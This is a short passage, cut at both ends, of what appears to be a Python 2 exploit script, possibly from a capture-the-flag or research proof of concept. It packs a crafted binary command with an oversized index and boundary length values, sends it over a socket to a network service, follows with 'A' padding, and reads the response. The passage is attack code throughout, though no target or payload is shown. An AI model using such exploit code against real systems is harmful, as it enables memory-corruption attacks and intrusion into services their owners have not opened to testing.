struct.pack("<i", y) cmd += struct.pack("<i", y) cmd += struct.pack("<I", 0x9) cmd += struct.pack("<I", 0x9) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 65535) cmd += struct.pack("<i", -65536) cmd += struct.pack("<I", 0x4) cmd += struct.pack("<I", 0x00e10052) # index !! cmd += struct.pack("<I", x) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * 0x1F s.send(cmd) first_check() print s.recv(0x60) #raw_input() for x in